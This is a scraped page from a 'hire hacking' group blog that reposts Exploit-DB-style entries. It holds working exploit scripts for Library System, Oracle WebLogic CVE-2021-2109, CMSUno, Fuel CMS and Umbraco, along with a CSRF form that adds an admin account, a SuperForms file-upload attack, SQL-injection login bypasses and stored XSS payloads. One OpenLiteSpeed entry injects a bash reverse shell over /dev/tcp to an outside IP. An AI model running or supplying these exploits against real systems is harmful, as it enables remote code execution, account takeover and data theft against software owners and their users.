Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153219

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
#STEP 1 : Run The Exploit With This Command : python3 exploit.py
#STEP 2 : Input the URL of Vulnable Application.  For Example: http://10.9.67.23/libsystem/
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser. 

#Note - You Will Only Be Able To Access The Student Area as a Privileged User.

import requests
YELLOW =  '\033[33m' # Yellow Text
GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults

print(YELLOW+'      _          ______  _               _  ___           ', RESET)
print(YELLOW+'  ___| |_ ___   / / ___|| |__   __ _  __| |/ _ \__      __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'|  __/ || (__ / /  ___) | | | | (_| | (_| | |_| |\ V  V / ', RESET)
print(YELLOW+' \___|\__\___/_/  |____/|_| |_|\__,_|\__,_|\___/  \_/\_/  ', RESET)
print(YELLOW+" ", RESET)                                                          
print('********************************************************')
print('**                  LIBRARY SYSTEM 1.0                **')
print('**     AUTHENTICATION BYPASS USING SQL INJECTION      **')
print('********************************************************')

print('Author - Himanshu Shukla')


#Create a new session

s = requests.Session() 
  
#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}

LINK=input("Enter URL of The Vulnarable Application : ")

#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"student":"'or 1 or'","login":""}
r=s.post(LINK+'login.php', data=values, cookies=cookies) 

r=s.post(LINK+'login.php', data=values, cookies=cookies) 

#Check if Authentication was bypassed or not.
logged_in = True if not("Student not found" in r.text) else False
l=logged_in
if l:
	print(GREEN+"[+]Authentication Bypass Successful!", RESET)
	print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
else:
	print(RED+"[-]Failed To Authenticate!", RESET)
HireHackking 
# Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
# Date: 2021-01-21
# Exploit Author: Photubias 
# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
# Vendor Homepage: https://www.oracle.com
# Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
# Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2
# CVE: CVE-2021-2109

#!/usr/bin/env python3
'''    
	Copyright 2021 Photubias(c)

        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org/licenses/>.
        
        File name CVE-2021-2109.py
        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

        This is a native implementation without requirements, written in Python 3.
        Works equally well on Windows as Linux (as MacOS, probably ;-)
        
        Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
         from https://github.com/welk1n/JNDI-Injection-Exploit
         to be in the same folder
'''
import urllib.request, urllib.parse, http.cookiejar, ssl
import sys, os, optparse, subprocess, threading, time

## Static vars; change at will, but recommend leaving as is
sURL = 'http://192.168.0.100:7001'
iTimeout = 5
oRun = None

## Ignore unsigned certs, if any because WebLogic is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context

class runJar(threading.Thread):
    def __init__(self, sJarFile, sCMD, sAddress):
        self.stdout = []
        self.stderr = ''
        self.cmd = sCMD
        self.addr = sAddress
        self.jarfile = sJarFile
        self.proc = None
        threading.Thread.__init__(self)

    def run(self):
        self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
        for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line)
        for line in iter(self.proc.stderr.readline, ''): self.stderr += line
        

def findJNDI():
    sCurDir = os.getcwd()
    sFile = ''
    for file in os.listdir(sCurDir):
        if 'JNDI' in file and '.jar' in file:
            sFile = file
    print('[+] Found and using ' + sFile)
    return sFile

def findJAVA(bVerbose):
    try:
        oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
    except:
        exit('[-] Error: java not found, needed to run the JAR file\n    Please make sure to have "java" in your path.')
    sResult = list(oProc.stdout)[0].decode()
    if bVerbose: print('[+] Found Java: ' + sResult)

def checkParams(options, args):
    if args: sHost = args[0]
    else:
        sHost = input('[?] Please enter the URL ['+sURL+'] : ')
        if sHost == '': sHost = sURL
        if sHost[-1:] == '/': sHost = sHost[:-1]
        if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
    if options.username: sUser = options.username
    else:
        sUser = input('[?] Username [weblogic] : ')
        if sUser == '': sUser = 'weblogic'
    if options.password: sPass = options.password
    else:
        sPass = input('[?] Password [Passw0rd-] : ')
        if sPass == '': sPass = 'Passw0rd-'
    if options.command: sCMD = options.command
    else:
        sCMD = input('[?] Command to run [calc] : ')
        if sCMD == '': sCMD = 'calc'
    if options.listenaddr: sLHOST = options.listenaddr
    else:
        sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ')
        if sLHOST == '': sLHOST = '192.168.0.10'
    if options.verbose: bVerbose = True
    else: bVerbose = False
    return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)

def startListener(sJarFile, sCMD, sAddress, bVerbose):
    global oRun
    oRun = runJar(sJarFile, sCMD, sAddress)
    oRun.start()
    print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
    oRun.join(3)
    if not oRun.stderr == '':
        exit('[-] Error starting Java listener:\n' + oRun.stderr)
    bThisLine=False
    if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
    for line in oRun.stdout:
        if bThisLine: return line.split('/')[3].replace('\n','')
        if 'JDK 1.8' in line: bThisLine = True

def endIt():
    global oRun
    print('[+] Closing threads')
    if oRun: oRun.proc.terminate()
    exit(0)

def main():
    usage = (
        'usage: %prog [options] URL \n'
        ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
        ' in the current working folder\n'
        'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
        'Only works when hacker is reachable via an IPv4 address\n'
        'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
        'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n'
        'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
        )

    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--username', '-u', dest='username')
    parser.add_option('--password', '-p', dest='password')
    parser.add_option('--command', '-c', dest='command')
    parser.add_option('--listen', '-l', dest='listenaddr')
    parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)

    ## Get or ask for the vars
    (options, args) = parser.parse_args()
    (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)

    ## Verify Java and JAR file
    sJarFile = findJNDI()
    findJAVA(bVerbose)
    
    ## Keep track of cookies between requests
    cj = http.cookiejar.CookieJar()
    oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    
    print('[+] Verifying reachability')
    ## Get the cookie
    oRequest = urllib.request.Request(url = sHost + '/console/')
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    for c in cj:
        if c.name == 'ADMINCONSOLESESSION':
            if bVerbose: print('[+] Got cookie "' + c.value + '"')

    ## Logging in
    lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
    lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
    oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    sResult = oResponse.read().decode(errors='ignore').split('\r\n')
    bSuccess = True
    for line in sResult:
        if 'Authentication Denied' in line: bSuccess = False
    if bSuccess: print('[+] Succesfully logged in!\n')
    else: exit('[-] Authentication Denied')
    
    ## Launch the LDAP listener and retrieve the random endpoint value
    sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
    if bVerbose: print('[+] Got Java value: ' + sRandom)

    ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1"
    print('\n[+] Firing exploit now, hold on')
    ##  http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-)
    sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
    sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
    if bVerbose: print('[!] Using URL ' + sFullUrl)
    oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    time.sleep(5)
    bExploitWorked = False
    for line in oRun.stdout:
        if 'Log a request' in line: bExploitWorked = True
        if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
    if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
    else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
    if bVerbose: print(oRun.stderr)
    endIt()

if __name__ == "__main__":
    try: main()
    except KeyboardInterrupt: endIt()
HireHackking 
# Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
# Date: 19.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.stvs.ch

STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)


Vendor: STVS SA
Product web page: http://www.stvs.ch
Platform: Ruby
Affected version:  5.9.10 (build 2885-3a8219a)
                   5.9.9 (build 2882-7c3b787)
                   5.9.7 (build 2871-a450938)
                   5.9.1 (build 2771-1bbed11)
                   5.9.0 (build 2701-6123026)
                   5.8.6 (build 2557-84726f7)
                   5.7
                   5.6
                   5.5

Summary: STVS is a Swiss company specializing in development of
software for digital video recording for surveillance cameras
as well as the establishment of powerful and user-friendly IP
video surveillance networks.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: Ubuntu 14.04.3
           nginx/1.12.1
           nginx/1.4.6
           nginx/1.1.19
           nginx/0.7.65
           nginx/0.3.61


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5625
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php

19.01.2021

--


<html>
  <body>
    <form action="http://192.168.1.17/users/create" method="POST">
      <input type="hidden" name="login" value="testingus" />
      <input type="hidden" name="password" value="testingus" />
      <input type="hidden" name="confirm&#95;password" value="testingus" />
      <input type="hidden" name="email" value="test&#64;test&#46;tld" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="hidden" name="never&#95;expire" value="on" />
      <input type="hidden" name="disabled&#95;acc" value="false" />
      <input type="submit" value="Forge request" />
    </form>
  </body>
</html>
HireHackking 
# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
# Date: 26/1/2021
# Exploit Author: cmOs - SunCSR
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.8
# Tested on Windows 10


Step 1: Log in to the dashboard using the Administrator account.
Step 2 : Access Server Configuration > External App > Command
Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
Step 5: Graceful Restart

[POC]

POST /view/confMgr.php HTTP/1.1
Host: target:7080
Connection: close
Content-Length: 579
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://target:7080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target:7080/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;
litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;
LSPA37FE0C43B84483E0=excYiZbpUS4%3D

name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077
HireHackking
# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting # Exploit Author: Mahendra Purbia # Vendor Homepage: http://egavilanmedia.com # Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/ # Version: 1.0 # Tested on: Windows 10 Vulnerable Parameters: Full Name Steps for reproduce: 1. go to http://localhost/PHPCRUD/ 2. now click on "add new record" and fill the details (in first name name use :"><svg onload=alert(1)// ) 3. Now reload the page and you will see that our XSS payload executed . Its an Stored XSS.
HireHackking

CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)

HACKER · %s · %s

# Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated) # Google Dorks: # inurl:uno/central.php # inurl:uno/config.php # inurl:uno.php intitle:"CMSUno - Login" # Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066 # Vendor Homepage: https://www.boiteasite.fr/cmsuno.html # Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz # Version: 1.6.1, 1.6.2 # Tested on: docker image: php:7.4-apache (Debian buster) # CVE : CVE-2020-25557 & CVE-2020-25538 # Vulnerabilities ## Discoverer: Fatih Çelik ## Discoverer website: https://fatihhcelik.blogspot.com ## Vulnerability 1: ## Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated) ## CVE: CVE-2020-25557 ## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html ## Vulnerability 2: ## Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated) ## CVE: CVE-2020-25538 ## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html #!/usr/bin/env ruby require 'httpclient' require 'docopt' # username = 'cmsuno' # password = '654321' # root_url = 'http://localhost:5000/' # command = 'pwd' doc = <<~DOCOPT CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated) Usage: #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug] #{__FILE__} -H | --help Options: -r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder -u <username>, --user <username> user name (if not default: cmsuno) -p <password>, --pass <password> User password (if not default: 654321) -c <cmd>, --command <cmd> Command to execute on the target -t <tehc>, --technique <tech> Technique: exploiting 'user' param (default, with output) or 'lang' param (blind) --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} -r http://example.org -c id #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang DOCOPT # Get anti-CSRF token def get_unox(client, auth_status) print '[*] Fetching anti-CSRF token: ' res = client.get(LOGIN_URL) case auth_status when false regexp = /name="unox" value="([a-f0-9]{32}?)"/ when true regexp = /Unox='([a-f0-9]{32}?)'/ end token = regexp.match(res.body).captures[0].chomp puts token return token end def login(client, user, pass) data = { 'unox' => get_unox(client, false), 'user' => user, 'pass' => pass, } puts '[*] Logging in' res = client.post(LOGIN_URL, data) return res.body end def exploit(client, user, pass, cmd, tech) payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// " case tech when 'user' data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en" when 'lang' data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}" else raise 'Wrong exploitation technique argument value' end headers = { 'X-Requested-With' => 'XMLHttpRequest' } #client.proxy = 'http://localhost:8080' puts "[*] Starting exploitation, using '#{tech}' param technique" client.post(VULNERABLE_URL, data, headers) # Login again to trigger uno/password.php clnt2 = HTTPClient.new return login(clnt2, user, pass).lines[..-2].join end begin args = Docopt.docopt(doc) pp args if args['--debug'] username = args['--user'] || 'cmsuno' password = args['--pass'] || '654321' technique = args['--technique'] || 'user' LOGIN_URL = "#{args['--root-url']}/uno.php" VULNERABLE_URL = "#{args['--root-url']}/uno/central.php" clnt = HTTPClient.new login(clnt, username, password) output = exploit(clnt, username, password, args['--command'], technique) print '[*] Command output:' case technique when 'user' puts "\n#{output}" when 'lang' puts ' blind RCE, no output with this exploitation technique' end rescue Docopt::Exit => e puts e.message end
HireHackking

Fuel CMS 1.4.1 - Remote Code Execution (2)

HACKER · %s · %s

# Title: Fuel CMS 1.4.1 - Remote Code Execution (2) # Exploit Author: Alexandre ZANNI # Date: 2020-11-14 # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Version: <= 1.4.1 # Tested on: Ubuntu 16.04 # CVE : CVE-2018-16763 # References: https://www.exploit-db.com/exploits/47138 #!/usr/bin/env ruby require 'httpclient' require 'docopt' # dirty workaround to ignore Max-Age # https://github.com/nahi/httpclient/issues/242#issuecomment-69013932 $VERBOSE = nil doc = <<~DOCOPT Fuel CMS 1.4 - Remote Code Execution Usage: #{__FILE__} <url> <cmd> #{__FILE__} -h | --help Options: <url> Root URL (base path) including HTTP scheme, port and root folder <cmd> The system command to execute -h, --help Show this screen Examples: #{__FILE__} http://example.org id #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd' DOCOPT def exploit(client, root_url, cmd) url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'" res = client.get(url) /system(.+?)<div/mx.match(res.body).captures[0].chomp end begin args = Docopt.docopt(doc) clnt = HTTPClient.new puts exploit(clnt, args['<url>'], args['<cmd>']) rescue Docopt::Exit => e puts e.message end
HireHackking

Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)

HACKER · %s · %s

# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) # Date: 2020-03-28 # Exploit Author: Alexandre ZANNI (noraj) # Based on: https://www.exploit-db.com/exploits/46153 # Vendor Homepage: http://www.umbraco.com/ # Software Link: https://our.umbraco.com/download/releases # Version: 7.12.4 # Category: Webapps # Tested on: Windows IIS # Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig import requests import re import argparse from bs4 import BeautifulSoup parser = argparse.ArgumentParser(prog='exploit.py', description='Umbraco authenticated RCE', formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80)) parser.add_argument('-u', '--user', metavar='USER', type=str, required=True, dest='user', help='username / email') parser.add_argument('-p', '--password', metavar='PASS', type=str, required=True, dest='password', help='password') parser.add_argument('-i', '--host', metavar='URL', type=str, required=True, dest='url', help='root URL') parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True, dest='command', help='command') parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False, dest='arguments', help='arguments', default='') args = parser.parse_args() # Payload payload = """\ <?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\ """ % (args.arguments, args.command) login = args.user password = args.password host = args.url # Process Login url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin" loginfo = { "username": login, "password": password} s = requests.session() r2 = s.post(url_login,json=loginfo) # Go to vulnerable web page url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx" r3 = s.get(url_xslt) soup = BeautifulSoup(r3.text, 'html.parser') VIEWSTATE = soup.find(id="__VIEWSTATE")['value'] VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'] UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'] headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN} data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE, "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR, "ctl00$body$xsltSelection": payload, "ctl00$body$contentPicker$ContentIdValue": "", "ctl00$body$visualizeDo": "Visualize+XSLT" } # Launch the attack r4 = s.post(url_xslt, data=data, headers=headers) # Filter output soup = BeautifulSoup(r4.text, 'html.parser') CMDOUTPUT = soup.find(id="result").getText() print(CMDOUTPUT)
HireHackking

WordPress Plugin SuperForms 4.9 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution # Exploit Author: ABDO10 # Date : Jan - 28 - 2021 # Google Dork : inurl:"/wp-content/plugins/super-forms/" # Vendor Homepage : https://renstillmann.github.io/super-forms/#/ # Version : All (<= 4.9.X) # data in http request : POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1 <=== exploit end point Host: localhost User-Agent: UserAgent Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------423513681827540048931513055996 Content-Length: 7058 Origin: localhost Connection: close Referer: localhost Cookie: -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="accept_file_types" jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <======= inject extension (|PHP4) to validate file to upload -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="max_file_size" 8000000 -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="image_library" 0 -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="files[]"; filename="filename.(extension)" <==== inject code extension (.php4) for example Content-Type: application/pdf Evil codes to be uploaded -----------------------------423513681827540048931513055996-- # Uploaded Malicious File can be Found in : /wp-content/uploads/superforms/2021/01/<id>/filename.php4 u can get <id> from server reply .
HireHackking

BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting

HACKER · %s · %s

# Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting # Exploit Author: LiPeiYi # Date: 2020-12-18 # Vendor Homepage: https://www.bloofox.com/ # Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1 # Version: 0.5.1.0 -.5.2.1 # Tested on: windows 10 Vulnerable paper: /admin/include/inc_content_articles.php Steps to reproduce: 1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side. 2: Add the new post and then add the payload "payload: <img src=# onerror=alert('xss')>" in "text" parameter and click on save button. Post Saved successfully. 3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.
HireHackking

Online Grading System 1.0 - 'uname' SQL Injection

HACKER · %s · %s

# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection # Date: 2021-01-28 # Exploit Author: Ruchi Tiwari # Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: uname # Injected Request POST /onlinegradingsystem/admin/login.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://localhost:8080 Connection: close Referer: http://localhost:8080/onlinegradingsystem/admin/login.php Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us Upgrade-Insecure-Requests: 1 uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin= #Application will load after 20 minutes. --------------------------------------------------------------------------------------------------------------------
HireHackking

MyBB Hide Thread Content Plugin 1.0 - Information Disclosure

HACKER · %s · %s

# Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure # Date: 1/27/2021 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://community.mybb.com/mods.php?action=view&pid=1430 # Version: 1.0 # Tested on: Windows 10 # CVE: CVE-2021-3337 1. Description: This plugin hides thread content until user replies to the thread. The information disclosure is hidden content can be viewed without replying. 2. Proof of Concept: - Visit a post where content is hidden - Click the reply or quote button below Thread content will be displayed in the [quote] bracket without needing to reply
HireHackking

Simple Public Chat Room 1.0 - Authentication Bypass SQLi

HACKER · %s · %s

# Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 POST /chat/login.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 51 Connection: close Referer: http://localhost/chat/index.php?attempt= Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl Upgrade-Insecure-Requests: 1 username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+--
HireHackking

Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting

HACKER · %s · %s

# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Replicates across chat sessions.. POST /chat/send_message.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 58 Origin: http://localhost Connection: close Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1
HireHackking

MyBB Delete Account Plugin 1.4 - Cross-Site Scripting

HACKER · %s · %s

